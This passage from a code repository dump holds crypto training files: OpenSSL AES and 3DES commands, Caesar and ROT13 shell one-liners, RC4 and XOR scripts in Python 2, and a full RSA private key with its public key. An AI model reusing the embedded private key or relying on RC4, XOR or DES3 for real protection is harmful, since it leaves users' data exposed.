generated : ia.p12 26 | 27 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/decrypt.txt: -------------------------------------------------------------------------------- 1 | hello 2 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/encrypt.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/trainings/crypto/openssl/encrypt.dat -------------------------------------------------------------------------------- /trainings/crypto/openssl/encrypt.txt: -------------------------------------------------------------------------------- 1 | hello 2 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/privatekey.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | MIICXQIBAAKBgQDDr1IM9HtETEN74fSYOXoY+OEBdygoY/NANb7zgfIJdNu+WK2Q 3 | Z4D+s1aGnEX4hj0FhOxpgXW1dmhJ2hHy9IRSK2T+XfeQHbwm/cVBcw8zwHaLRzls 4 | qeF+wG8pAsr1tTItVea2dpF6K/X8bmX2zQP+3EQsGKsHu4xaV6n9c0AhxQIDAQAB 5 | AoGANzuLC0EOce6ctaDHaxf+EIJe8Azz9sKPbDY/WXf6GxUy2P0qsDGmxT1VVNVT 6 | IpyxKJemKvlxgfCT6xR0MIE3v4NCFam7366PxdLnTy2dNYRXBohezxRH+PMTAPIJ 7 | UyI/2xci9OSlYa3PaLn2fZKjhGo5YRs9jzjPbiNYdduSQhkCQQDlBQhU/SIUNMJK 8 | go+WvEA+nbQ2FA0rQfURPbqvOoPSyW9oJj6PQyalTZDWVxiEuV44b82Qybr3JBE6 9 | UMMzb4M7AkEA2rzy2sLjB2e5P8wQF/5uvSeoKPVw8dzUPHc1Z5mQCEmcz7EweGvh 10 | 8aYIUbzHoCf8pb4DoB4MU38+6wxRzaqe/wJBAJ+HIOWqqhlvIsOqLIEwQoQbcFOX 11 | JhEy0ZWf7TFwTjD/NcZTlZJPkVTmMfTMGH0jbnlbj9LCYqUSj5mSdlaW388CQQCA 12 | 2jl9YLx4SkO4Ly9z0u/NAaVvq1YDRADKNbcB9lYAa8yyFEDnTzXkMdhIvhoiYCvW 13 | Pt7H3auJLDYWJEW0D8RlAkANv2HZUvH7NNHyCzJ6QjdNpF2ZNMVWMSXkSn/3Np7n 14 | AHzVbo2ffWZT4jSHLYUMYH7IIv9pI1yYSbaaxcItHExx 15 | -----END RSA PRIVATE KEY----- 16 | -------------------------------------------------------------------------------- /trainings/crypto/openssl/pubkey.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDDr1IM9HtETEN74fSYOXoY+OEB 3 | dygoY/NANb7zgfIJdNu+WK2QZ4D+s1aGnEX4hj0FhOxpgXW1dmhJ2hHy9IRSK2T+ 4 | XfeQHbwm/cVBcw8zwHaLRzlsqeF+wG8pAsr1tTItVea2dpF6K/X8bmX2zQP+3EQs 5 | GKsHu4xaV6n9c0AhxQIDAQAB 6 | -----END PUBLIC KEY----- 7 | -------------------------------------------------------------------------------- /trainings/crypto/topics/aes/intro.txt: -------------------------------------------------------------------------------- 1 | openssl aes-256-cbc -a -salt -in secrets.txt -out secrets.txt.enc 2 | 3 | openssl aes-256-cbc -d -a -in secrets.txt.enc -out secrets.txt.new 4 | 5 | 6 | -------------------------------------------------------------------------------- /trainings/crypto/topics/aes/secrets.txt: -------------------------------------------------------------------------------- 1 | secrets are there 2 | -------------------------------------------------------------------------------- /trainings/crypto/topics/aes/secrets.txt.new: -------------------------------------------------------------------------------- 1 | secrets are there 2 | -------------------------------------------------------------------------------- /trainings/crypto/topics/aes/serects.txt.enc: -------------------------------------------------------------------------------- 1 | U2FsdGVkX19hVWHVUgRPw0UztmWiyfqRVzuFALdtyHxL7PNPxBEHN2r5Rww4547j 2 | -------------------------------------------------------------------------------- /trainings/crypto/topics/crypto_basic.txt: -------------------------------------------------------------------------------- 1 | ceaser cipher: 2 | # Caesar cipher encoding 3 | echo "THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG" | tr '[A-Z]' '[X-ZA-W]' 4 | # output: QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD 5 | # Caesar cipher decoding 6 | echo "QEB NRFZH YOLTK CLU GRJMP LSBO QEB IXWV ALD" | tr '[X-ZA-W]' '[A-Z]' 7 | # output: THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG 8 | # Can also be adjusted to ROT13 instead 9 | echo "THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG" | tr '[A-Z]' '[N-ZA-M]' 10 | # output: GUR DHVPX OEBJA SBK WHZCF BIRE GUR YNML QBT 11 | echo "GUR DHVPX OEBJA SBK WHZCF BIRE GUR YNML QBT" | tr '[N-ZA-M]' '[A-Z]' 12 | # output: THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG 13 | # Case-sensitive version of ROT13 14 | tr '[A-Za-z]' '[N-ZA-Mn-za-m]' 15 | 16 | XOR Encryption: 17 | 18 | 19 | 20 | -------------------------------------------------------------------------------- /trainings/crypto/topics/des/a.txt: -------------------------------------------------------------------------------- 1 | echo 'this is the plain text' > plaintext.txt 2 | openssl enc -e -des3 -salt -in plaintext.txt -out ciphertext.bin 3 | 4 | hd ciphertext.bin 5 | 6 | openssl enc -d -des3 -in ciphertext.bin -out plaintext2.txt 7 | 8 | diff plaintext.txt plaintext2.txt 9 | 10 | 11 | -------------------------------------------------------------------------------- /trainings/crypto/topics/rc4/a.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """ 3 | Copyright (C) 2012 Bo Zhu http://about.bozhu.me 4 | Permission is hereby granted, free of charge, to any person obtaining a 5 | copy of this software and associated documentation files (the "Software"), 6 | to deal in the Software without restriction, including without limitation 7 | the rights to use, copy, modify, merge, publish, distribute, sublicense, 8 | and/or sell copies of the Software, and to permit persons to whom the 9 | Software is furnished to do so, subject to the following conditions: 10 | The above copyright notice and this permission notice shall be included in 11 | all copies or substantial portions of the Software. 12 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 13 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 14 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL 15 | THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 16 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING 17 | FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER 18 | DEALINGS IN THE SOFTWARE. 19 | """ 20 | def KSA(key): 21 | keylength = len(key) 22 | S = range(256) 23 | j = 0 24 | for i in range(256): 25 | j = (j + S[i] + key[i % keylength]) % 256 26 | S[i], S[j] = S[j], S[i] # swap 27 | return S 28 | def PRGA(S): 29 | i = 0 30 | j = 0 31 | while True: 32 | i = (i + 1) % 256 33 | j = (j + S[i]) % 256 34 | S[i], S[j] = S[j], S[i] # swap 35 | K = S[(S[i] + S[j]) % 256] 36 | yield K 37 | def RC4(key): 38 | S = KSA(key) 39 | return PRGA(S) 40 | if __name__ == '__main__': 41 | # test vectors are from http://en.wikipedia.org/wiki/RC4 42 | # ciphertext should be BBF316E8D940AF0AD3 43 | key = 'Key' 44 | plaintext = 'Plaintext' 45 | # ciphertext should be 1021BF0420 46 | #key = 'Wiki' 47 | #plaintext = 'pedia' 48 | # ciphertext should be 45A01F645FC35B383552544B9BF5 49 | #key = 'Secret' 50 | #plaintext = 'Attack at dawn' 51 | def convert_key(s): 52 | return [ord(c) for c in s] 53 | key = convert_key(key) 54 | keystream = RC4(key) 55 | import sys 56 | for c in plaintext: 57 | sys.stdout.write("%02X" % (ord(c) ^ keystream.next())) 58 | print 59 | -------------------------------------------------------------------------------- /trainings/crypto/topics/rc4/rc4.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ 4 | Copyright (C) 2012 Bo Zhu http://about.bozhu.me 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a 7 | copy of this software and associated documentation files (the "Software"), 8 | to deal in the Software without restriction, including without limitation 9 | the rights to use, copy, modify, merge, publish, distribute, sublicense, 10 | and/or sell copies of the Software, and to permit persons to whom the 11 | Software is furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in 14 | all copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL 19 | THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING 21 | FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER 22 | DEALINGS IN THE SOFTWARE. 23 | """ 24 | 25 | 26 | def KSA(key): 27 | keylength = len(key) 28 | 29 | S = range(256) 30 | 31 | j = 0 32 | for i in range(256): 33 | j = (j + S[i] + key[i % keylength]) % 256 34 | S[i], S[j] = S[j], S[i] # swap 35 | 36 | return S 37 | 38 | 39 | def PRGA(S): 40 | i = 0 41 | j = 0 42 | while True: 43 | i = (i + 1) % 256 44 | j = (j + S[i]) % 256 45 | S[i], S[j] = S[j], S[i] # swap 46 | 47 | K = S[(S[i] + S[j]) % 256] 48 | yield K 49 | 50 | 51 | def RC4(key): 52 | S = KSA(key) 53 | return PRGA(S) 54 | 55 | 56 | if __name__ == '__main__': 57 | # test vectors are from http://en.wikipedia.org/wiki/RC4 58 | 59 | # ciphertext should be BBF316E8D940AF0AD3 60 | key = 'Key' 61 | plaintext = 'Plaintext' 62 | 63 | # ciphertext should be 1021BF0420 64 | #key = 'Wiki' 65 | #plaintext = 'pedia' 66 | 67 | # ciphertext should be 45A01F645FC35B383552544B9BF5 68 | #key = 'Secret' 69 | #plaintext = 'Attack at dawn' 70 | 71 | def convert_key(s): 72 | return [ord(c) for c in s] 73 | key = convert_key(key) 74 | 75 | keystream = RC4(key) 76 | 77 | import sys 78 | for c in plaintext: 79 | sys.stdout.write("%02X" % (ord(c) ^ keystream.next())) 80 | print 81 | -------------------------------------------------------------------------------- /trainings/crypto/topics/xor.py: -------------------------------------------------------------------------------- 1 | from Crypto.Cipher import XOR 2 | import base64 3 | 4 | def encrypt(key, plaintext): 5 | cipher = XOR.new(key) 6 | return base64.b64encode(cipher.encrypt(plaintext)) 7 | 8 | def decrypt(key, ciphertext): 9 | cipher = XOR.new(key) 10 | return cipher.decrypt(base64.b64decode(ciphertext)) 11 | plaintext = raw_input('Message:') 12 | key = raw_input('key:') 13 | ciphertext = encrypt(key,plaintext) 14 | print "Ciphertext:", ciphertext 15 | print "Plaintext:" , decrypt(key,ciphertext) 16 | 17 | --------------------------------------------------------------------------------

%s

%s

%s

%s

%s%s%s%s